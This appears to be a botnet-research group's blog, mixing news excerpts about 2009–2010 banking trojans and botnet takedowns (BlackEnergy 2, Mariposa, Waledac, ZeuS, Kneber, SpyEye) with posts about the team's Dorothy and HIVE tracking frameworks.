05.03
2010
RSA Conference 2010 — Russian hackers have written a more sophisticated version of the infamous BlackEnergy Trojan associated with the 2008 cyberattacks against Georgia that now targets Russian and Ukrainian online banking customers.
. “The rules have changed,” Stewart says. “There was once an unwritten rule that they didn’t attack their own banks.”
But like most cybercrime operations, money is money, and the BlackEnergy botnet gang appears to be expanding its operations for more profit.
While the Zeus Trojan remains the most popular Trojan, Stewart says BlackEnergy 2 can do things Zeus cannot, such as stealing online credentials plus DDoS-ing. BlackEnergy 2 also steals the user’s private encryption key. Stewart has written an analysis of the Trojan, available here.
via New BlackEnergy Trojan Targeting Russian, Ukrainian Banks – DarkReading.
03.03
2010
SAN FRANCISCO (AP) — Authorities have smashed one of the world’s biggest networks of virus-infected computers, a data vacuum that stole credit cards and online banking credentials from as many as 12.7 million poisoned PCs.
The “botnet” of infected computers included PCs inside more than half of the Fortune 1,000 companies and more than 40 major banks, according to investigators.
Spanish investigators, working with private computer-security firms, have arrested the three alleged ringleaders of the so-called Mariposa botnet, which appeared in December 2008 and grew into one of the biggest weapons of cybercrime. More arrests are expected soon in other countries.
Spanish authorities have planned a news conference for Wednesday in Madrid.
[....]
Also, the suspects go against the stereotype of genius programmers often associated with cyber crime. The suspects weren't brilliant hackers but had underworld contacts who helped them build and operate the botnet, Cesar Lorenza, a captain with Spain's Guardia Civil, which is investigating the case, told The Associated Press.
Investigators were examining bank records and seized computers to determine how much money the criminals made.
[....]
via News from The Associated Press.
An Analysis report by DefenceIntelligence here
25.02
2010
The takedown of the Waledac botnet that Microsoft executed this week – known internally as “Operation b49” – was the result of months of investigation and the innovative application of a tried and true legal strategy.
[..]
In a recent analysis, Microsoft found that between December 3-21, 2009, approximately 651 million spam emails attributable to Waledac were directed to Hotmail accounts alone, including offers and scams related to online pharmacies, imitation goods, jobs, penny stocks and more.
[..]
This action has quickly and effectively cut off traffic to Waledac at the “.com” or domain registry level, severing the connection between the command and control centers of the botnet and most of its thousands of zombie computers around the world.
via The Official Microsoft Blog – Cracking Down on Botnets.
Well done.
23.02
2010
Port Austin, Mich. based United Shortline Insurance Service Inc., an insurance provider serving the railroad industry, discovered on Feb. 5 that the computer used by their firm’s controller was behaving oddly and would not respond. The company’s computer technician scoured the system with multiple security tools, and found it had been invaded by “ZeuS,” a highly sophisticated banking Trojan that steals passwords and allows criminals to control infected hosts remotely
[...]
“The bank said whoever logged in to make these transfers successfully answered those questions,” he said. “They had some very detailed information. [The thieves] knew our patterns, they knew our passwords, my mother’s middle name, favorite sports team. And this is all information I don’t even have written down anywhere.”
via Hackers Steal $150,000 from Mich. Insurance Firm — Krebs on Security.
19.02
2010
The “Kneber” botnet is made up of 74,126 machines in 196 countries that were infected with a variant of Zeus, Alex Cox, a principal analyst at NetWitness and the botnet's discoverer, told SCMagazineUS.com on Thursday.
…
The stolen data also includes credentials for corporate accounts and online banking sites, Cox said. The gang of hackers behind the attack, believed to be from Eastern Europe, have likely stolen millions of credentials.Cox discovered the botnet on Jan. 26 during routine analysis of a client's enterprise network.
….
The botnet was named Kneber, after the email address used to register the command-and-control server linking infected systems worldwide, he said.
via Newly discovered Zeus spinoff botnet has wide impact – SC Magazine US.
Here the NetWitness research paper.
From Kneber FAQ :
06. What’s so special about it?
It’s the fact that despite the crimeware’s advanced E-banking sessions hijacking, the primary objective of their campaign — at least based on the sample analyzed by NetWitness researchers — was to steal social networking credentials.
Moreover, the Kneber botnet is a good example of an ongoing trend aiming to build and maintain beneath the radar botnets
15.02
2010
Upstart crimeware wages turf war on mighty Zeus bot • The Register.
The SpyEye toolkit made its debut in December on Russian underground forums with a retail price of $500. It comes with usual configurable amenities such as a keylogger, credential stealers for credit cards, FTP and Pop3 email accounts, and a graphical control panel for managing large botnets.
Here is a deep analysis provided by Symantec.
If anyone know more (like malware hashes, or something else) please contact us, we are just investigating this new kind of trojans.
24.12
2009
Folks,
I would like to wish you a beautiful christmas ave!
Special wishes to our team, focusly to who is daily devoting its time contributing in our project.
Claudio Guarnieri, Andrea Cavenago, and Patrizia Martemucci recentrly worked hard for developing new modules of Dororthy framework (a malware analysis module, and the new dorothy-drone), really thanks for their support, I wish that during next year they will continue to give their fruitful contribution.
Next year we well back in action, and relasing the new version of Dorothy (Dorothive) will be the primary project goal. So stay tuned!
Best Regards,
m4rco-
16.12
2009
Folks,
I would like to inform you all about our recent activities that we are attempting to achieve.
First of all, we have totally rebuilt our web site. This new ones aim to be a central repository of all the (external/internal) news concerning botnets (mainly) and malwares (secondary).
We will use the blog for posting about our project developments, and for commenting/reporting interesting news concerning the field that we are currently treating, so you can now add a new entry to your feeds reader 
The repository section aims to maintain a complete library of all the publications redacted (by us or others) until today about botnets. Each one can be tagged and classified for giving an easy way for searching what a researcher needs. If you have a paper/doc about botnets, we will be proud to upload it here!
The Dorothy section is the web GUI of the framework developed by me about irc-botnet tracking through interactive visualization. Maybe you have seen it before (I’ve posted the link in this mailing list some months ago), since that I’ve improved the GUI adding a “malwares” task for each C&C, and providing an afterglow graph for each malware and for each C&C .
We are also maintaining a Wiki, here you can find all information about our tools/activities: you are all invited to contribute on it. The wiki has been recently “plugged” with the GUI giving the possibility to create a new page for each C&C, in this way, every researcher can write about his own investigation about it.
Then I would like to introduce two new chapter members: Emanuele Goldoni , and Davide Cavalca.
I’ve ask them to join in our team after reading their research work regarding a development of an automated framework for malware analysis and irc/web botnet tracking.
Their tool “HIVE” is really similar to the ones developed by me , but present a more robust data architecture. Dorothy and HIVE was developed to achieve the same goal, whereas the first ones focus on the visualization methods as its straight point, the second treats the acquisition process in a more engineering manner: the data repository has been designed for being capable for receiving data for a wide sensor deployment.
We are currently defining the details of a possible collaboration between the Information Technology Department of the University of Milan and the Networking Lab of the University of Pavia (where Emanuele works as researcher) . Both universities are current offering their graduating students for conducting their diploma thesis about the improvement of our framework. Currently, we are following the work of three students: one is developing a new multiplatform drone for irc botnet tracking, and the others are developing a dedicated framework for malware analysis (static and dynamic).
Currently, me and Davide are developing a new integrated framework (Dorothive) that inherit all the goodness of our previous tools.
Thanks to Davide and Emanuele’s contribution, our chapter is growing fast, they are a very skilled people and they are so motivated as me to make our chapter more interesting as possible: working with them is a real pleasure.
I ask you all to view our new site, for accessing to the private sections (wiki, Dorothy) you need to register.
Currently registrations are not open to the wide public, so if you want an account please let me know and I will provide you one.
Please to give us your feeds/comments/suggestions/criticisms/anything , we will consider it as a treasure !
Best Regars,
m4rco-
14.12
2009
Message Labs' list of top 10 botnets in 2009
via Top 10 botnets and their impact.
